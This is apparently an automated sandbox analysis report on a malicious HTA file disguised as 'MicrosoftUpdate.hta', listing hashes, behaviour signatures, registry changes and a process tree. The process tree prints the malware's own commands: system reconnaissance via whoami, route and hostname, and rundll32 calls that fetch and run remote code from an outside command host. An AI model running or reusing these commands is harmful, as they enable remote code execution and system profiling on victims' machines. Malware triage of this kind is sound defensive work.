8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869

General

Target

MicrosoftUpdate.hta
Size

26KB
MD5

12cd7a34e347311c7f07b5b10adb1266
SHA1

fc35180c4e3f0e95e02b163ddbd79ce4151e3ee4
SHA256

8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869
SHA512

31e4558f4fa8e9adc1e288b025ad3085f89abf3a89bb6a3857cea773c25cd97efb01cb5e814dc6f91766042f7ce1f007e621b84f09500d3672d5828a584c0e38

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

mshta.exerundll32.exerundll32.exerundll32.exe

flow pid process

4 1840 mshta.exe
7 280 rundll32.exe
8 280 rundll32.exe
10 1688 rundll32.exe
11 1688 rundll32.exe
13 1688 rundll32.exe
14 968 rundll32.exe
15 968 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
4	1840	mshta.exe
7	280	rundll32.exe
8	280	rundll32.exe
10	1688	rundll32.exe
11	1688	rundll32.exe
13	1688	rundll32.exe
14	968	rundll32.exe
15	968	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

T1112

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exemshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	rundll32.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

taskmgr.exe

pid process

1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe
1780 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

whoami.exewhoami.exetaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1692	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1044	whoami.exe
Token: SeDebugPrivilege	1780	taskmgr.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

taskmgr.exe

pid	process
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe

Suspicious use of SendNotifyMessage 34 IoCs

Processes:

taskmgr.exe

pid	process
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe
1780	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mshta.execmd.execmd.execmd.exerundll32.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1840 wrote to memory of 1508	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1508	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1508	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1508	1840	mshta.exe	cmd.exe
PID 1508 wrote to memory of 1568	1508	cmd.exe	chcp.com
PID 1508 wrote to memory of 1568	1508	cmd.exe	chcp.com
PID 1508 wrote to memory of 1568	1508	cmd.exe	chcp.com
PID 1508 wrote to memory of 1568	1508	cmd.exe	chcp.com
PID 1508 wrote to memory of 1692	1508	cmd.exe	whoami.exe
PID 1508 wrote to memory of 1692	1508	cmd.exe	whoami.exe
PID 1508 wrote to memory of 1692	1508	cmd.exe	whoami.exe
PID 1508 wrote to memory of 1692	1508	cmd.exe	whoami.exe
PID 1840 wrote to memory of 1604	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1604	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1604	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1604	1840	mshta.exe	cmd.exe
PID 1604 wrote to memory of 440	1604	cmd.exe	chcp.com
PID 1604 wrote to memory of 440	1604	cmd.exe	chcp.com
PID 1604 wrote to memory of 440	1604	cmd.exe	chcp.com
PID 1604 wrote to memory of 440	1604	cmd.exe	chcp.com
PID 1840 wrote to memory of 1924	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1924	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1924	1840	mshta.exe	cmd.exe
PID 1840 wrote to memory of 1924	1840	mshta.exe	cmd.exe
PID 1924 wrote to memory of 952	1924	cmd.exe	chcp.com
PID 1924 wrote to memory of 952	1924	cmd.exe	chcp.com
PID 1924 wrote to memory of 952	1924	cmd.exe	chcp.com
PID 1924 wrote to memory of 952	1924	cmd.exe	chcp.com
PID 1924 wrote to memory of 1080	1924	cmd.exe	ROUTE.EXE
PID 1924 wrote to memory of 1080	1924	cmd.exe	ROUTE.EXE
PID 1924 wrote to memory of 1080	1924	cmd.exe	ROUTE.EXE
PID 1924 wrote to memory of 1080	1924	cmd.exe	ROUTE.EXE
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 1840 wrote to memory of 280	1840	mshta.exe	rundll32.exe
PID 280 wrote to memory of 1568	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1568	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1568	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1568	280	rundll32.exe	cmd.exe
PID 1568 wrote to memory of 1508	1568	cmd.exe	chcp.com
PID 1568 wrote to memory of 1508	1568	cmd.exe	chcp.com
PID 1568 wrote to memory of 1508	1568	cmd.exe	chcp.com
PID 1568 wrote to memory of 1508	1568	cmd.exe	chcp.com
PID 1568 wrote to memory of 1044	1568	cmd.exe	whoami.exe
PID 1568 wrote to memory of 1044	1568	cmd.exe	whoami.exe
PID 1568 wrote to memory of 1044	1568	cmd.exe	whoami.exe
PID 1568 wrote to memory of 1044	1568	cmd.exe	whoami.exe
PID 280 wrote to memory of 1708	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1708	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1708	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 1708	280	rundll32.exe	cmd.exe
PID 1708 wrote to memory of 1468	1708	cmd.exe	chcp.com
PID 1708 wrote to memory of 1468	1708	cmd.exe	chcp.com
PID 1708 wrote to memory of 1468	1708	cmd.exe	chcp.com
PID 1708 wrote to memory of 1468	1708	cmd.exe	chcp.com
PID 280 wrote to memory of 916	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 916	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 916	280	rundll32.exe	cmd.exe
PID 280 wrote to memory of 916	280	rundll32.exe	cmd.exe
PID 916 wrote to memory of 1160	916	cmd.exe	chcp.com

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MicrosoftUpdate.hta"
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\9957969d-a6d3-cd5b-58d5-34018079df5d.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:1568

C:\Windows\SysWOW64\whoami.exe
whoami /all
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\d4ebb5a6-109e-7881-858c-c3a1df4e4687.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\730a997c-dc27-5024-a514-54f5bbe2b93f.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:952

C:\Windows\SysWOW64\ROUTE.EXE
route PRINT
3⤵
PID:1080

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?6MCQS7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;\..\..\..\./mshtml,RunHTMLApplication
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\d6b39e99-4727-8fb6-bae8-67096ab83179.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:1508

C:\Windows\SysWOW64\whoami.exe
whoami /all
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\8ede43df-0764-fcbb-2068-c8fafbd48f23.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\e3d04452-33ab-0201-dfa5-55b7f3a5f1c7.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:1160

C:\Windows\SysWOW64\ROUTE.EXE
route PRINT
4⤵
PID:1152

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?3VXPGU55T6=62603dff132641cb9d6a85af99c13b52;BZKGKO48UY=;\..\..\..\./mshtml,RunHTMLApplication
3⤵
- Blocklisted process makes network request
PID:1688

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?3VXPGU55T6=62603dff132641cb9d6a85af99c13b52;BZKGKO48UY=b1a047e9eb264749a4433885f0952614;\..\..\..\./mshtml,RunHTMLApplication
4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & hostname 1> C:\Users\Admin\AppData\Local\Temp\5cf03113-2735-d131-087b-e5eef35df05e.txt 2>&1
5⤵
PID:916

C:\Windows\SysWOW64\chcp.com
chcp 437
6⤵
PID:1620

C:\Windows\SysWOW64\HOSTNAME.EXE
hostname
6⤵
PID:752

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 264
5⤵
- Modifies Internet Explorer settings
PID:1596

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 264
3⤵
- Modifies Internet Explorer settings
PID:1372

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1780

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5cf03113-2735-d131-087b-e5eef35df05e.txt
MD5
553694b431b45197f6c7cca54d725d1c

SHA1
ba37024e5f4d75772fadbbbd5897845296ef380b

SHA256
508d8c5332f22bef513df6733492381629db3836379f5b128009cff8d24cd253

SHA512
c1a519ff3813092ab3dc1461d20f77f296d09850cc8f6e688d900a8cd51387e3c9404f0bbd7bd1df1cd32890e84d817f2f9adaa173201b93154a4ef7273b6b19

Download Submit
C:\Users\Admin\AppData\Local\Temp\730a997c-dc27-5024-a514-54f5bbe2b93f.txt
MD5
16728e3a56299be3f68430ca84e31015

SHA1
850ceb70b8195f4a33d5f1572a485327c4a0b37e

SHA256
4dc3216a1aec80dcc47b41b8820e0359ba8219a4642a0520ab8f8e0b7a6fa5bb

SHA512
a8e6816c594887fc8fa56ae254c4353de327d9ac43332b85d0e0b36d10050e0407f765948cc3f192bf8ac956170a56da74dbe54e1335682d21ccccc769981a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\8ede43df-0764-fcbb-2068-c8fafbd48f23.txt
MD5
f0d77ff34694f66fa41eab0f98efa362

SHA1
2ecc80e3560b66e79b6653b0652a9f05bee30d9b

SHA256
99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

SHA512
7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\9957969d-a6d3-cd5b-58d5-34018079df5d.txt
MD5
5db9a3587043ceec21079b303680bd32

SHA1
5bff21bb47933d08e60163b40ea80faf905e29cd

SHA256
54391223d9d3eebd7482081fbbe30eaf679b1dbe93fd10644d866f0ca48be4cb

SHA512
ebf3f3cec44f9f4eebc2602a8be273642f29dab7c3bcc06985ea9d2b8ecd4c49733e572cb3aedc6084cbd7de5c60894f9bdfd730aa19714cacb2d5e6af17025d

Download Submit
C:\Users\Admin\AppData\Local\Temp\d4ebb5a6-109e-7881-858c-c3a1df4e4687.txt
MD5
f0d77ff34694f66fa41eab0f98efa362

SHA1
2ecc80e3560b66e79b6653b0652a9f05bee30d9b

SHA256
99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

SHA512
7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\d6b39e99-4727-8fb6-bae8-67096ab83179.txt
MD5
5db9a3587043ceec21079b303680bd32

SHA1
5bff21bb47933d08e60163b40ea80faf905e29cd

SHA256
54391223d9d3eebd7482081fbbe30eaf679b1dbe93fd10644d866f0ca48be4cb

SHA512
ebf3f3cec44f9f4eebc2602a8be273642f29dab7c3bcc06985ea9d2b8ecd4c49733e572cb3aedc6084cbd7de5c60894f9bdfd730aa19714cacb2d5e6af17025d

Download Submit
C:\Users\Admin\AppData\Local\Temp\e3d04452-33ab-0201-dfa5-55b7f3a5f1c7.txt
MD5
16728e3a56299be3f68430ca84e31015

SHA1
850ceb70b8195f4a33d5f1572a485327c4a0b37e

SHA256
4dc3216a1aec80dcc47b41b8820e0359ba8219a4642a0520ab8f8e0b7a6fa5bb

SHA512
a8e6816c594887fc8fa56ae254c4353de327d9ac43332b85d0e0b36d10050e0407f765948cc3f192bf8ac956170a56da74dbe54e1335682d21ccccc769981a6d

Download Submit
memory/280-70-0x0000000000000000-mapping.dmp

Download
memory/280-71-0x00000000757C1000-0x00000000757C3000-memory.dmp

Filesize
8KB

Download
memory/440-64-0x0000000000000000-mapping.dmp

Download
memory/752-91-0x0000000000000000-mapping.dmp

Download
memory/916-89-0x0000000000000000-mapping.dmp

Download
memory/916-79-0x0000000000000000-mapping.dmp

Download
memory/952-67-0x0000000000000000-mapping.dmp

Download
memory/968-87-0x0000000000000000-mapping.dmp

Download
memory/1044-74-0x0000000000000000-mapping.dmp

Download
memory/1080-68-0x0000000000000000-mapping.dmp

Download
memory/1152-81-0x0000000000000000-mapping.dmp

Download
memory/1160-80-0x0000000000000000-mapping.dmp

Download
memory/1372-85-0x0000000000000000-mapping.dmp

Download
memory/1468-77-0x0000000000000000-mapping.dmp

Download
memory/1508-59-0x0000000000000000-mapping.dmp

Download
memory/1508-73-0x0000000000000000-mapping.dmp

Download
memory/1568-72-0x0000000000000000-mapping.dmp

Download
memory/1568-60-0x0000000000000000-mapping.dmp

Download
memory/1596-93-0x0000000000000000-mapping.dmp

Download
memory/1604-63-0x0000000000000000-mapping.dmp

Download
memory/1620-90-0x0000000000000000-mapping.dmp

Download
memory/1688-83-0x0000000000000000-mapping.dmp

Download
memory/1692-61-0x0000000000000000-mapping.dmp

Download
memory/1708-76-0x0000000000000000-mapping.dmp

Download
memory/1780-95-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp

Filesize
8KB

Download
memory/1924-66-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads